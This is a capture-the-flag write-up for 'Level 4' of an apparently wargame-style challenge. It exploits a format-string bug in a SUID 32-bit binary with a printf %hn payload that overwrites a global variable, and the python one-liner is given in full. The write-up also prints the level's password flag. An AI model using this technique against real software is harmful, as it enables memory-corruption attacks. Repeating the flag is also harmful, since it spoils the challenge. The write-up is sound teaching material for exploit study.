# Level 4

Binary: 32-bit ELF, SUID level5, dynamically linked.

## Analysis

### Ghidra output

```c
int m;

void p(char *s) {
    printf(s);               // format string vulnerability
}

void n(void) {
    char local_20c[520];
    fgets(local_20c, 0x200, stdin);
    p(local_20c);
    if (m == 0x1025544) {
        system("/bin/cat /home/user/level5/.pass");
    }
}

void main(void) { n(); }
```

Same pattern as level3 with two differences:

1. printf is wrapped inside `p()` instead of called directly by `n()`.
2. The target value is `0x01025544` (16,930,116 decimal) instead of `0x40`.
3. On success, `system` runs `cat .../.pass` directly, so no shell needed.

## Finding the pieces

### Address of m

From the disassembly of `n`:

```asm
mov    0x8049810,%eax           ; load m
cmp    $0x1025544,%eax           ; compare with target
```

So `m` is at `0x08049810`.

### Buffer position on printf's stack

```
$ ./level4
AAAA %x %x %x %x %x %x %x %x %x %x %x %x
AAAA b7ff26b0 bffffcb4 b7fd0ff4 0 0 bffffc78 804848d bffffa70 200 b7fd1ac0 b7ff37d0 41414141
```

`41414141` is at the 12th position, so my input starts at position 12. The extra frame from `p()` shifts things compared to level3 (where it was position 4).

## Why %hn instead of %n

Target value `0x01025544` = 16,930,116 bytes. Writing that many bytes via `%n` would take forever (printf would loop through millions of padding chars). Instead, split into two 16-bit writes with `%hn`:

| Part | Bytes in target | Decimal |
|---|---|---|
| High | `0x0102` (bits 16..31) | 258 |
| Low  | `0x5544` (bits 0..15)  | 21828 |

`%hn` writes only the low 16 bits of the byte count, so any 16-bit value is reachable.

## Building the payload

Write the smaller value first (258) then the larger (21828), because the byte count only grows.

Layout:
```
position 12 → [m+2]   ← where high (0x0102) will be written
position 13 → [m]     ← where low (0x5544) will be written

printed bytes running total:
  8   (two addresses)
+ 250 (via %250x)
= 258 → %12$hn writes 0x0102 to m+2
+ 21570 (via %21570x)
= 21828 → %13$hn writes 0x5544 to m
```

Numbers:
- pad1 = 258 - 8 = 250
- pad2 = 21828 - 258 = 21570

## Exploit

```bash
python -c 'print "\x12\x98\x04\x08\x10\x98\x04\x08" + "%250x%12$hn" + "%21570x%13$hn"' | ./level4
```

Output:
```
<lots of hex padding>
0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a
```

Flag: `0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a`

## Notes

### Addresses in little-endian

- `m`   = 0x08049810 → `\x10\x98\x04\x08`
- `m+2` = 0x08049812 → `\x12\x98\x04\x08`

### Direct pipe, no `; cat`

Unlike level1, 2, 3 which spawn `/bin/sh`, this level runs a self-contained command via system. The flag is printed and the program exits. Direct pipe is enough.

### Single quotes for the python arg

`$` inside single quotes is literal, so `%12$hn` stays as is (no need for `\$`). Using double quotes would require `\$` to prevent bash from treating `$` as variable expansion.
